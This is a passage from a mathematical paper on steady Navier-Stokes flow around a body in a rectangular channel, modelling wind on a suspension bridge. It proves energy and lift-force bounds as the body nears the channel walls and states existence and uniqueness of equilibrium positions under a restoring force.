\partial_{1}\zeta_{l}V_{\rm in}+\partial_{1}\zeta_{r}V_{\rm out})e_{1}\right)\,,\] \[\partial_{2}s=\lambda\bigg{(}-\nabla^{\perp}\partial_{2}\zeta_{l}\int_{-H}^{x_ {2}}V_{\rm in}-\nabla^{\perp}\partial_{2}\zeta_{r}\int_{-H}^{x_{2}}V_{\rm out }-\nabla^{\perp}\zeta_{l}V_{\rm in}-\nabla^{\perp}\zeta_{r}V_{\rm out}\] Using that \(V_{\rm in},V_{\rm out}\in W^{2,\infty}(-H,H)\) and that \(\zeta_{l},\zeta_{r}\) are smooth, it follows that \[\begin{split}\|s\|_{L^{\infty}(\Omega_{h})},\|s\|_{L^{2}(\Omega_ {h})},\,\|s\|_{L^{4}(\Omega_{h})},\,\,\|\nabla s\|_{L^{2}(\Omega_{h})},\,\, \|\Delta s\|_{L^{2}(\Omega_{h})}\leq C_{h}\lambda,\\ \|s\cdot\nabla s\|_{L^{2}(\Omega_{h})}\leq C_{h}\lambda^{2}\leq C _{h}\lambda.\end{split} \tag{2.25}\] We need to quantify the dependence of \(C_{h}>0\) on \(\varepsilon_{b}(h)\) and \(\varepsilon_{t}(h)\). On the one hand, we notice that, by construction, both \(\zeta_{l}\) and \(\zeta_{r}\) depend on \(x_{2}\) only in \[\Omega_{\varepsilon_{t}(h)}:=[-2\tau,2\tau]\times[H-\tfrac{\varepsilon_{t}(h) }{2},H]. \tag{2.26}\] In this domain the \(x_{1}\)-derivatives of \(\zeta_{l}\) and \(\zeta_{r}\) are uniformly bounded with respect to \(h\) while the \(x_{2}\)-derivatives blow-up as \(\varepsilon_{t}(h)\) goes to zero, for instance we have \[|\partial_{2}\zeta_{l}|,|\partial_{2}\zeta_{r}|\leq C(\varepsilon_{t}(h))^{-1 },\qquad|\partial_{2}^{2}\zeta_{r}|,|\partial_{2}^{2}\zeta_{l}|\leq C( \varepsilon_{t}(h))^{-2}.\] Therefore, in \(\Omega_{\varepsilon_{t}(h)}\) \[|s|\leq C(1+ (\varepsilon_{t}(h))^{-1})\lambda,\quad|\partial_{1}s|\leq C(1+ (\varepsilon_{t}(h))^{-1})\lambda,\] \[|\partial_{2}s|\leq C((\varepsilon_{t}(h))^{-1}+(\varepsilon_{t} (h))^{-2})\lambda.\] On the other hand, the cut-off functions depend only on \(x_{1}\) in \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}\) and their \(x_{1}\) and \(x_{2}\)-derivatives are uniformly bounded with respect to \(h\). Therefore, in \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}\) \[|s|,|\partial_{1}s|,|\partial_{2}s|\leq C\lambda.\] Gathering all together, we refine the bounds in (2.25) as \[\begin{split}\|s\|_{L^{\infty}(\Omega_{h})}&\leq C (1+(\varepsilon_{t}(h))^{-1})\lambda,\\ \|s\|_{L^{2}(\Omega_{h})}&\leq C\lambda+C\left(\int_ {\Omega_{\varepsilon_{t}(h)}}(\varepsilon_{t}(h))^{-2}\right)^{1/2}\lambda \leq C(1+(\varepsilon_{t}(h))^{-1/2})\lambda,\\ \|s\|_{L^{4}(\Omega_{h})}&\leq C(1+(\varepsilon_{t} (h))^{-3/4})\lambda,\qquad\|\nabla s\|_{L^{2}(\Omega_{h})}\leq C(1+( \varepsilon_{t}(h))^{-3/2})\lambda,\\ \|\Delta s\|_{L^{2}(\Omega_{h})},\,\,\|s\cdot\nabla s\|_{L^{2}( \Omega_{h})}\leq C(1+(\varepsilon_{t}(h))^{-5/2})\lambda,\end{split} \tag{2.27}\] with all the constants \(C>0\) independent of \(h\). Then, testing (2.12) with \(v=u-s\) we obtain \[\mu\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}=-\int_{\Omega_{h}}v\cdot\nabla s\cdot v- \int_{\Omega_{h}}s\cdot\nabla s\cdot v-\mu\int_{\Omega_{h}}\nabla s:\nabla v \tag{2.28}\] We want to estimate, when possible, only \(s\) and not \(\nabla s\) since the bounds for \(s\) are less singular in terms of \(\varepsilon_{t}(h)\). Hence, since \(\nabla\cdot v=\nabla\cdot s=0\) and using integration by parts, we rewrite (2.28) as \[\mu\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}= \int_{\Omega_{h}}v\cdot\nabla v\cdot s+\int_{\Omega_{h}}s\cdot \nabla v\cdot s-\mu\int_{\Omega_{h}}\nabla s:\nabla v. \tag{2.29}\] We split the first integral in the right-hand side over \(\Omega_{\varepsilon_{t}(h)}\) and \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}\). On the one hand, since \(v_{|_{\Gamma_{t}}}=0\), Poincare inequality \[\|v\|_{L^{2}(\Omega_{\varepsilon_{t}(h)})}\leq\frac{\varepsilon_{t}(h)}{2} \|\nabla v\|_{L^{2}(\Omega_{\varepsilon_{t}(h)})},\] and Holder inequality yield \[\int_{\Omega_{\varepsilon_{t}(h)}}(v\cdot\nabla v)\cdot s \leq\|v\|_{L^{2}(\Omega_{\varepsilon_{t}(h)})}\|\nabla v\|_{L^{2 }(\Omega_{\varepsilon_{t}(h)})}\|s\|_{L^{\infty}(\Omega_{\varepsilon_{t}(h)})}\] \[\leq C\varepsilon_{t}(h)\|\nabla v\|_{L^{2}(\Omega_{\varepsilon_ {t}(h)})}^{2}(1+(\varepsilon_{t}(h))^{-1})\lambda\leq C\lambda\|\nabla v\|_{L ^{2}(\Omega_{\varepsilon_{t}(h)})}^{2},\] where we used that \(\|s\|_{L^{\infty}(\Omega_{\varepsilon_{t}(h)})}\leq C(1+(\varepsilon_{t}(h))^ {-1})\lambda\) and \(\varepsilon_{t}(h)\leq 2H-\delta_{b}-\delta_{t}\). On the other hand, since \(v_{|_{\Gamma_{l},\Gamma_{r}}}=0\), Poincare and Holder inequalities yield \[\int_{\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}}(v\cdot \nabla v)\cdot s \leq\|v\|_{L^{2}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}) }\|\nabla v\|_{L^{2}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)})}\|s\|_{ L^{\infty}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)})}\] \[\leq C\lambda\|\nabla v\|_{L^{2}(\Omega_{h}\setminus\Omega_{ \varepsilon_{t}(h)})}^{2},\] where we used that \(\|s\|_{L^{\infty}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)})}\leq C\lambda\). Therefore, from (2.27) and (2.29) we infer \[\mu\|\nabla v\|_{L^{2}(\Omega_{h})}^{2} \leq C\lambda\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}+\|s\|_{L^{4}( \Omega_{h})}^{2}\|\nabla v\|_{L^{2}(\Omega_{h})}+\mu\|\nabla s\|_{L^{2}( \Omega_{h})}\|\nabla v\|_{L^{2}(\Omega_{h})}\] \[\leq C\lambda\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}+C(1+(\varepsilon _{t}(h))^{-3/2})(\lambda+\lambda^{2})\|\nabla v\|_{L^{2}(\Omega_{h})}.\] Then, for \(\lambda\in[0,\Lambda)\) with \(\Lambda\) as in (2.20) we have \[\|\nabla v\|_{L^{2}(\Omega_{h})}\leq C(1+(\varepsilon_{t}(h))^{-3/2})\lambda \tag{2.30}\] and \[\|u\|_{H^{1}(\Omega_{h})}\leq\|\nabla v\|_{L^{2}(\Omega_{h})}+\|s\|_{H^{1}( \Omega_{h})}\leq C(1+(\varepsilon_{t}(h))^{-3/2})\lambda,\] which proves (2.21). When \(U=0\), we claim that the unique strong solution \(u\) to (2.4) satisfies \[\|u\|_{H^{1}(\Omega_{h})}\leq C\lambda \tag{2.31}\] with \(C>0\) independent of \(h\). In this case, we shall define the cut-off functions and the solenoidal extension differently depending if \(h\leq 0\) or \(h>0\). If \(h\leq 0\), we define \(\zeta_{l}\), \(\zeta_{r}\) as in (2.22)-(2.23) (see Figure 4 below) replacing \(\varepsilon_{t}(h)\) with the distance of to \(\Gamma_{t}\), namely \(\varepsilon_{t}(0)=H-\delta_{t}\). The solenoidal extension \(s\) is then defined as in (2.24). By construction both \(\zeta_{l}\) and \(\zeta_{r}\) depend on \(x_{2}\) only in \(\Omega_{\varepsilon_{t}(0)}\), defined as in (2.26) with \(\varepsilon_{t}(h)\) replaced by \(\varepsilon_{t}(0)\). In this domain both \(x_{1}\) and \(x_{2}\)-derivatives of \(\zeta_{l}\) and \(\zeta_{r}\) are uniformly bounded with respect to \(h\), for instance we have \[|\partial_{2}\zeta_{l}|,|\partial_{2}\zeta_{r}|\leq C(\varepsilon_{t}(0))^{-1} \leq C,\qquad|\partial_{2}^{2}\zeta_{r}|,|\partial_{2}^{2}\zeta_{l}|\leq C( \varepsilon_{t}(0))^{-2}\leq C.\] Since in \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(0)}\) the cut-off functions depend only on \(x_{1}\), we infer that \(s\), \(\partial_{1}s\) and \(\partial_{2}s\) are uniformly bounded with respect to \(h\) in all \(\Omega_{h}\) and \[\|s\|_{L^{\infty}(\Omega_{h})},\|s\|_{L^{2}(\Omega_{h})},\|s\|_{L^{4}(\Omega_ {h})},\|\nabla s\|_{L^{2}(\Omega_{h})}\leq C\lambda. \tag{2.32}\] Repeating the same computations as in the case \(U=1\) and using (2.32), we obtain (2.31) for \(h\leq 0\). If \(h>0\), we make a vertical reflection \(x_{2}\mapsto-x_{2}\) and we consider the new cut-off functions defined piece-wise in the regions of Figure 4, where \(\varepsilon_{b}(0)=H-\delta_{b}\). Then, we consider the vector field \(s:R\to\mathbb{R}^{2}\) defined by \[s(x_{1},x_{2}):=\lambda\nabla^{\perp}\left(\zeta_{l}(x_{1},x_{2})\int_{x_{2}} ^{H}V_{\rm in}(z)dz+\zeta_{r}(x_{1},x_{2})\int_{x_{2}}^{H}V_{\rm out}(z)dz \right),\] which is solenoidal and satisfies the boundary conditions in (2.4). By the same argument used when \(h\leq 0\), \(s\), \(\partial_{1}s\) and \(\partial_{2}s\) are uniformly bounded with respect to \(h\) in \(\Omega_{h}\). Therefore, using again (2.32), we obtain (2.31) for \(h<0\). _Remark 2.3_.: We stated (2.7) and (2.8) only in case of uniqueness because, in what follows, \(\lambda\) will be taken small and higher powers of \(\lambda\) can be upper estimated with the first power. The reflection method used to obtain the regularity result has its own interest. The rectangular shape of the domain is crucial and the technique fails for other polygons. However, in the case of convex polygons, in particular also for a rectangle, one can obtain the more \(C^{\infty}\)-regularity result by using Theorem 2 in [11]. ## 3. Equilibrium configurations of a FSI problem By Theorem 2.2, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\) there exists a unique strong solution \((u,p)=(u(\lambda,h),p(\lambda,h))\) to (2.4). The fluid described by \((u,p)\) in \(\Omega_{h}\) exerts on \(B_{h}\) a force perpendicular to the direction of the inflow, called _lift_ (see [14]). Since the inflow in (2.4) is horizontal, the lift is vertical and given by \[L(\lambda,h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n, \tag{3.1}\] where \(\mathbb{T}\) is the fluid stress tensor, namely \[\mathbb{T}(u,p):=\mu(\nabla u+\nabla u^{T})-p\mathbb{I}\,,\] and \(n\) is the unit outward normal vector to \(\partial\Omega_{h}\), which, on \(\partial B_{h}\), points towards the interior of \(B_{h}\). The regularity of the solution (see Theorem 2.2) and the smoothness of \(\partial B_{h}\) yield \(\mathbb{T}(u,p)_{|_{\partial B_{h}}}\in H^{1/2}(\partial B_{h})\subset L^{1} (\partial B_{h})\), hence the integral in (3.1) is finite. In fact, the lift can also be defined for merely weak solutions, see (7.5) in Section 7. Note that (3.1) holds for any \(\lambda\geq 0\) and any solution to (2.4) but our main result on the FSI problem focuses on small inflows, see Theorem 3.1. This is why in this section we restrict to \(\lambda\in[0,\Lambda)\). Aiming to model, in particular, a wind flow hitting a suspension bridge, the body \(B\) may also be subject to a (possibly nonsmooth) vertical restoring force \(f\) tending to maintain \(B\) in the equilibrium position \(B_{0}\) (for \(h=0\)); see Section 7. We assume that \(f\) depends only on the position \(h\), that \(f\in C^{0}(-H+\delta_{b},H-\delta_{t})\) with \(f(0)=0\) and \[\exists\gamma>0\quad\text{s.t.}\quad\frac{f(h_{1})-f(h_{2})}{h_{1}-h_{2}}\geq \gamma\quad\forall h_{1},h_{2}\in(-H+\delta_{b},H-\delta_{t}),\ h_{1}\neq h_{2}. \tag{3.2}\] Moreover, we assume that there exists \(K>0\) such that \[\begin{split}&\limsup_{h\to-H+\delta_{b}}\ f(h)(H-\delta_{b}+h)^{3/2}\leq-K,\\ &\liminf_{h\to H-\delta_{t}}\ \frac{f(h)}{\max\{(H-\delta_{t}-h)^{ -3/2},U(H-\delta_{t}-h)^{-3}\}}\geq K.\end{split} \tag{3.3}\] The assumption (3.3) is somehow technical and prevents collisions of \(B\) with the horizontal boundary \(\Gamma_{b}\cup\Gamma_{t}\), at least for small inflow/outflow. It can probably be relaxed but, so far, only few (numerical) investigations on the effect of proximity to collisions of hydrodynamic forces (such as the lift), acting on non-spherical bodies, have been tackled, see [18] and references therein. The presence of \(U\) in (3.3) highlights the different behavior of \(f\) when \(B\) is close to \(\Gamma_{t}\) for \(U=0\) or \(U=1\). In the first case, \(f\) has the same strength close to \(\Gamma_{b}\) and \(\Gamma_{t}\). Conversely, for \(U=1\), the asymmetry of the boundary conditions requires a different strength of \(f\), which is stronger when \(B\) is close to \(\Gamma_{t}\) than when \(B\) is close to \(\Gamma_{b}\). Overall, (3.2)-(3.3) model the fact that \(B\) is not allowed to go too far away from the equilibrium position \(B_{0}\). Since we are interested in the equilibrium configurations of the FSI problem, we consider the boundary-value problem (2.4) coupled with a compatibility condition stating that the restoring force balances the lift force, namely \[\begin{split}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\quad\nabla\cdot u =0\quad\text{in}\quad\Omega_{h}\\ u_{|_{\partial B_{h}}}\!=\!u_{|_{\Gamma_{b}}}\!=0,\quad u_{|_{ \Gamma_{t}}}\!=\lambda Ue_{1},\quad u_{|_{\Gamma_{l}}}\!=\lambda V_{\text{in}} (x_{2})e_{1},\quad u_{|_{\Gamma_{r}}}\!=\lambda V_{\text{out}}(x_{2})e_{1},\\ f(h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n.\end{split} \tag{3.4}\] Our main result concerns the existence and uniqueness of the solution to (3.4) for small values of \(\lambda\): **Theorem 3.1**.: _Let \(f\in C^{0}(-H+\delta_{b},H-\delta_{t})\) satisfy (3.2)-(3.3) with \(f(0)=0\) and \(V_{\text{in}}\), \(V_{\text{out}}\in W^{2,\infty}(-H,H)\) satisfy (2.3) with (2.5). There exists \(\Lambda_{1}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that for \(\lambda\in[0,\Lambda_{1})\) the FSI problem (3.4) admits a unique solution \((u(\lambda,h),p(\lambda,h),h)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h}) \times(-H+\delta_{b},H-\delta_{t})\) given by_ \[(u(\lambda,\mathfrak{h}(\lambda)),p(\lambda,\mathfrak{h}(\lambda)),\mathfrak{ h}(\lambda)).\] The proof of Theorem 3.1 is given in Section 5. It is fairly delicate because if \(U=0\) (as for symmetric inflow/outflow), then from (2.21) we infer that the \(H^{1}\)-norm is uniformly bounded with respect to \(h\). However, if \(U=1\), the same norm obviously blow up when \(B_{h}\) approaches \(\Gamma_{t}\), which affects the bounds for the lift in (3.1). As already mentioned, very little is known when a body approaches a collision, see again [18] and references therein. Therefore, the next statement has its own independent interest, it provides some upper bounds and shows that, probably, the lift behaves differently for homogeneous and inhomogeneous boundary data. **Theorem 3.2**.: _Assume (2.5) and consider \(\Lambda\) as in Theorem 2.2. Let \((u,p)\) be the unique strong solution to (2.4) and let \(L(\lambda,h)\) be as in (3.1). There exists \(C>0\) such that, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\),_ \[|L(\lambda,h)|\leq C\Big{(}(\varepsilon_{b}(h))^{-3/2}+\max\{(\varepsilon_{t }(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\}\Big{)}\lambda \tag{3.5}\] _with \(\varepsilon_{b}(h)\) and \(\varepsilon_{t}(h)\) defined in (2.6)._ The proof of Theorem 3.2 is given in the next section. ## 4. Proof of Theorem 3.2 We rewrite the lift (3.1), which is a boundary integral, as a volume integral. This can be done by considering \(w\in H^{1}(\Omega_{h})\) that satisfies \[\nabla\cdot w=0\quad\text{in}\quad\Omega_{h},\qquad w_{|_{\partial B_{h}}}=e_ {2},\qquad w_{|_{\partial R}}=0. \tag{4.1}\] The Divergence Theorem ensures that (4.1) admits infinitely many solutions. Testing (2.4) with one such solution \(w\) yields \[\int_{\Omega_{h}}u\cdot\nabla u\cdot w=\int_{\Omega_{h}}\nabla\cdot\mathbb{T} (u,p)\cdot w=-\int_{\Omega_{h}}\nabla u:\nabla w+\int_{\partial\Omega_{h}} \mathbb{T}(u,p)n\cdot w\] and, using the boundary conditions on \(w\), \[-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n=-\int_{\Omega_{h}}u\cdot \nabla u\cdot w-\int_{\Omega_{h}}\nabla u:\nabla w. \tag{4.2}\] Among the infinitely many solutions of (4.1), we select one obtained by using a solenoidal extension similar to the ones introduced in Section 2. We consider a cut-off function \(\chi\in C^{\infty}(\overline{R})\) with \(0\leq\chi\leq 1\) such that \[\chi(x_{1},x_{2})=\begin{cases}1&\text{in}\quad[-\tau,\tau]\times[h-\delta_{b},h +\delta_{t}],\\ 0&\text{in}\quad\Omega_{h}\setminus([-2\tau,2\tau]\times[h-\delta_{b}-\frac{ \varepsilon_{b}(h)}{2},h+\delta_{t}+\frac{\varepsilon_{t}(h)}{2}]),\\ \chi(x_{1})&\text{in}\quad([-2\tau,-\tau]\cup[\tau,2\tau])\times[h-\delta_{b}, h+\delta_{t}].\end{cases}\] We put \(w=\nabla^{\perp}(x_{1}\chi)\). Clearly \(w\in H^{1}(\Omega_{h})\) satisfies (4.1) and supp \(w\subseteq\Omega_{w}=\Omega_{w,b}\cup\Omega_{w,c}\cup\Omega_{w,t}\) with \[\Omega_{w,b} :=[-2\tau,2\tau]\times[h-\delta_{b}-\tfrac{\varepsilon_{b}(h)}{ 2},h-\delta_{b}],\qquad\Omega_{w,c}:=[-2\tau,2\tau]\times[h-\delta_{b},h+ \delta_{t}],\] \[\Omega_{w,t} :=[-2\tau,2\tau]\times[h+\delta_{t},h+\delta_{t}+\tfrac{ \varepsilon_{t}(h)}{2}].\] Moreover, from the definition of \(\chi\) it follows that \(w\) and its \(x_{1}\) and \(x_{2}\)-derivatives are uniformly bounded with respect to \(h\) in \(\Omega_{w,c}\), while in \(\Omega_{w,b}\) \[|w|\leq C(1+(\varepsilon_{b}(h))^{-1}),\quad|\partial_{1}w|\leq(1+( \varepsilon_{b}(h))^{-1}),\] \[|\partial_{2}w|\leq((\varepsilon_{b}(h))^{-1}+(\varepsilon_{b}(h) )^{-2}) \tag{4.3}\] and in \(\Omega_{w,t}\) \[|w|\leq C(1+(\varepsilon_{t}(h))^{-1}),\quad|\partial_{1}w|\leq( 1+(\varepsilon_{t}(h))^{-1}),\] \[|\partial_{2}w|\leq((\varepsilon_{t}(h))^{-1}+(\varepsilon_{t}(h) )^{-2}). \tag{4.4}\] \(B_{h}\) _close to \(\Gamma_{b}\)._ We consider the case when \(h\) is close to \(-H+\delta_{b}\), hence \(\varepsilon_{b}(h)\) is close to zero. This implies that \(\varepsilon_{t}(h)\geq 1\) and the bounds in (4.4) become uniform. Choosing in (4.2) the previously constructed \(w\), we observe that the integrals in the right-hand side are defined only on \(\Omega_{w}\). Let us split these integrals over the regions \(\Omega_{w,b}\), which is shrinking as \(\varepsilon_{b}(h)\) goes to zero, and \(\Omega_{w}\setminus\Omega_{w,b}\). On the one hand, Holder inequality and (2.7) yield \[\begin{split}&\left|\int_{\Omega_{w}\setminus\Omega_{w,b}}u \cdot\nabla u\cdot w+\int_{\Omega_{w}\setminus\Omega_{w,b}}\nabla u:\nabla w \right|\\ &\leq C\|u\|_{H^{1}(\Omega_{h})}^{2}\|w\|_{L^{\infty}(\Omega_{w} \setminus\Omega_{w,b})}+\|\nabla u\|_{L^{2}(\Omega_{h})}\|\nabla w\|_{L^{2}( \Omega_{w}\setminus\Omega_{w,b})}\\ &\leq C(\|u\|_{H^{1}(\Omega_{h})}^{2}+\|u\|_{H^{1}(\Omega_{h})}) \leq C\lambda\end{split} \tag{4.5}\] for \(\lambda\in[0,\Lambda)\), using that \(w\) and its derivatives are uniformly bounded with respect to \(h\) in \(\Omega_{w}\setminus\Omega_{w,b}\). On the other hand, since \(w\equiv 0\) in \(\Omega_{w,b}^{0}:=[-2\tau,2\tau]\times[-H,h-\delta_{b}-\tfrac{\varepsilon_{b} (h)}{2}]\) and \(u_{|_{\Gamma_{b}}}=0\), Poincare inequality for \(u\) in \(\Omega_{w,b}\cup\Omega_{w,b}^{0}\), the Holder inequality and (2.7) yield \[\begin{split}&\left|\int_{\Omega_{w,b}}u\cdot\nabla u\cdot w \right|=\left|\int_{\Omega_{w,b}\cup\Omega_{w,b}^{0}}u\cdot\nabla u\cdot w \right|\\ &\leq\varepsilon_{b}(h)\|\nabla u\|_{L^{2}(\Omega_{w,b}\cup \Omega_{w,b}^{0})}^{2}\|w\|_{L^{\infty}(\Omega_{w,b})}\leq C\|u\|_{H^{1}( \Omega_{h})}^{2}\leq C\lambda\end{split} \tag{4.6}\] and \[\left|\int_{\Omega_{w,b}}\nabla u:\nabla w\right|\leq\|u\|_{H^{1}(\Omega_{h})}\| \nabla w\|_{L^{2}(\Omega_{w,b})}\leq C(\varepsilon_{b}(h))^{-3/2}\lambda, \tag{4.7}\] for \(\lambda\in[0,\Lambda)\), using that \(\|w\|_{L^{\infty}(\Omega_{w,b})}\leq C(\varepsilon_{b}(h))^{-1}\) and \(\|\nabla w\|_{L^{2}(\Omega_{w,b})}\leq C(\varepsilon_{b}(h))^{-3/2}\) for \(\varepsilon_{b}(h)\) close to zero, due to (4.3). Putting together (4.5)-(4.7), then there exists \(\eta_{b}>0\) sufficiently small such that, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},-H+\delta_{b}+\eta_{b})\), \[|L(\lambda,h)|\leq C(\varepsilon_{b}(h))^{-3/2}\lambda. \tag{4.8}\] We remark that the same blow-up rate in (4.8) could be obtained without taking advantage of Poincare inequality in (4.6) but using directly \(u\in H^{1}\subset L^{4}\). This idea, however, will be crucial to obtain a better blow-up rate for the lift in the case when the body is close to \(\Gamma_{t}\). \(B_{h}\) _close to \(\Gamma_{t}\)._ We consider the case when \(h\) is close to \(H-\delta_{t}\), hence \(\varepsilon_{t}(h)\) is close to zero. Analogously to what done in the previous case, we split the integrals over the regions \(\Omega_{w,t}\), which is shrinking as \(\varepsilon_{t}(h)\) goes to zero, and \(\Omega_{w}\setminus\Omega_{w,t}\). On the one hand, Holder inequality yields \[\left|\int_{\Omega_{w}\setminus\Omega_{w,t}}u\cdot\nabla u\cdot w +\int_{\Omega_{w}\setminus\Omega_{w,t}}\nabla u:\nabla w\right|\] \[\leq C\|u\|_{H^{1}(\Omega_{h})}^{2}\|w\|_{L^{\infty}(\Omega_{w} \setminus\Omega_{w,t})}+\|\nabla u\|_{L^{2}(\Omega_{h})}\|\nabla w\|_{L^{2}( \Omega_{w}\setminus\Omega_{w,t})}\] \[\leq C(\|u\|_{H^{1}(\Omega_{h})}^{2}+\|u\|_{H^{1}(\Omega_{h})})\] using that \(w\) and its derivatives are uniformly bounded with respect to \(h\) in \(\Omega_{w}\setminus\Omega_{w,t}\). On the other hand, since \(w\equiv 0\) in \(\Omega_{w,t}^{0}:=[-2\tau,2\tau]\times[h+\delta_{t}+\frac{\varepsilon_{t}(h)} {2},H]\) and \(u=v+s\) with \(v_{|_{\Gamma_{t}}}=0\), Poincare inequality for \(v\) in \(\Omega_{w,t}\cup\Omega_{w,t}^{0}\) and Holder inequality yield \[\left|\int_{\Omega_{w,t}}u\cdot\nabla u\cdot w\right|=\left|\int _{\Omega_{w,t}\cup\Omega_{w,t}^{0}}v\cdot\nabla u\cdot w+\int_{\Omega_{w,t} \cup\Omega_{w,t}^{0}}s\cdot\nabla u\cdot w\right|\] \[\leq\varepsilon_{t}(h)\|\nabla v\|_{L^{2}(\Omega_{h})}\|\nabla u \|_{L^{2}(\Omega_{h})}\|w\|_{L^{\infty}(\Omega_{w,t})}+\|s\|_{L^{2}(\Omega_{ h})}\|\nabla u\|_{L^{2}(\Omega_{h})}\|w\|_{L^{\infty}(\Omega_{w,t})}\] \[\leq C\|\nabla v\|_{L^{2}(\Omega_{h})}\|u\|_{H^{1}(\Omega_{h})}+ C\|s\|_{L^{2}(\Omega_{h})}\|u\|_{H^{1}(\Omega_{h})}(\varepsilon_{t}(h))^{-1}\] and \[\left|\int_{\Omega_{w,t}}\nabla u:\nabla w\right|\leq\|u\|_{H^{1}(\Omega_{h}) }\|\nabla w\|_{L^{2}(\Omega_{w,t})}\leq\|u\|_{H^{1}(\Omega_{h})}(\varepsilon_{ t}(h))^{-3/2},\] using that \(\|w\|_{L^{\infty}(\Omega_{w,t})}\leq C(\varepsilon_{t}(h))^{-1}\) and \(\|\nabla w\|_{L^{2}(\Omega_{w,t})}\leq C(\varepsilon_{t}(h))^{-3/2}\) for \(\varepsilon_{t}(h)\) close to zero, due to (4.4). Now we shall distinguish the cases \(U=1\) and \(U=0\). When \(U=1\), using (2.7), (2.27) and (2.30) we obtain, for \(\lambda\in[0,\Lambda)\), \[\left|\int_{\Omega_{w}\setminus\Omega_{w,t}}u\cdot\nabla u\cdot w +\int_{\Omega_{w}\setminus\Omega_{w,t}}\nabla u:\nabla w\right|\leq C( \varepsilon_{t}(h))^{-3}\lambda \tag{4.9}\] and \[\left|\int_{\Omega_{w,t}}u\cdot\nabla u\cdot w\right|\leq C(\varepsilon_{t}(h))^{ -3}\lambda,\quad\left|\int_{\Omega_{w,t}}\nabla u:\nabla w\right|\leq C( \varepsilon_{t}(h))^{-3}\lambda. \tag{4.10}\] When \(U=0\), using (2.7) and (2.32), we obtain, for \(\lambda\in[0,\Lambda)\), \[\left|\int_{\Omega_{w}\setminus\Omega_{w,t}}u\cdot\nabla u\cdot w+\int_{ \Omega_{w}\setminus\Omega_{w,t}}\nabla u:\nabla w\right|\leq C\lambda \tag{4.11}\] and \[\left|\int_{\Omega_{w,t}}u\cdot\nabla u\cdot w\right|\leq C(\varepsilon_{t}(h) )^{-1}\lambda,\quad\left|\int_{\Omega_{w,t}}\nabla u:\nabla w\right|\leq C( \varepsilon_{t}(h))^{-3/2}\lambda. \tag{4.12}\] Putting together (4.9)-(4.12), then there exists \(\eta_{t}>0\) sufficiently small such that, for \((\lambda,h)\in[0,\Lambda)\times(H-\delta_{t}-\eta_{t},H-\delta_{t})\), \[|L(\lambda,h)|\leq C\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h))^ {-3}\}\lambda. \tag{4.13}\] For \(h\in[-H+\delta_{b}+\eta_{b},H-\delta_{t}-\eta_{t}]\), \(\varepsilon_{b}(h)\) and \(\varepsilon_{t}(h)\) are uniformly bounded from below with respect to \(h\). Therefore, by combining (4.8) and (4.13), there exists \(C>0\) independent of \(h\) such that, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\), \[|L(\lambda,h)|\leq C((\varepsilon_{b}(h))^{-3/2}+\max\{(\varepsilon_{t}(h))^{ -3/2},U(\varepsilon_{t}(h))^{-3}\})\lambda.\] ## 5. Proof of Theorem 3.1 ### Continuity and monotonicity of the global force In Section 3 we have already set the lift \(L(\lambda,h)\) as a function of \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\). Let \(f\) be the restoring force satisfying (3.2)-(3.3). Then, the global force acting on \(B_{h}\) is the function \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) defined by \[\phi(\lambda,h)=f(h)+L(\lambda,h). \tag{5.1}\] We first focus on the \(\lambda\)-dependence by maintaining \(h\) fixed and we prove the Lipschitz-continuity of the map \(\lambda\mapsto\phi(\lambda,h)\). **Proposition 5.1**.: _Let \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) be as in (5.1). There exists \(\overline{\lambda}\in(0,\Lambda]\) such that \(\lambda\mapsto\phi(\lambda,h)\) is Lipschitz continuous in \([0,\overline{\lambda})\) for all \(h\in(-H+\delta_{b},H-\delta_{t})\)._ Proof.: Since \(f\) does not depend on \(\lambda\) we only need to show that \(\lambda\mapsto L(\lambda,h)\) is Lipschitz continuous in a neighborhood of \(\lambda=0\). For \(\lambda_{1},\lambda_{2}\in[0,\Lambda)\) consider, respectively, the solutions \((u(\lambda_{1}),p(\lambda_{1}))\) and \((u(\lambda_{2}),p(\lambda_{2}))\) to (2.4). Let \[v:=u(\lambda_{1})-u(\lambda_{2}),\qquad q:=p(\lambda_{1})-p(\lambda_{2}), \tag{5.2}\] so that \((v,q)\) satisfies \[-\mu\Delta v+v\cdot\nabla v+\nabla q=-v\cdot\nabla u(\lambda_{2} )-u(\lambda_{2})\cdot\nabla v,\qquad\nabla\cdot v=0\quad\text{in}\quad\Omega _{h},\] \[v_{|_{\Gamma_{t}}}=(\lambda_{1}-\lambda_{2})Ue_{1},\ v_{|_{\Gamma _{t}}}=(\lambda_{1}-\lambda_{2})V_{\text{in}}(x_{2})e_{1},\ v_{|_{\Gamma_{r}}}= (\lambda_{1}-\lambda_{2})V_{\text{out}}(x_{2})e_{1},\] \[v_{|_{\partial B_{h}}}=v_{|_{\Gamma_{b}}}=0. 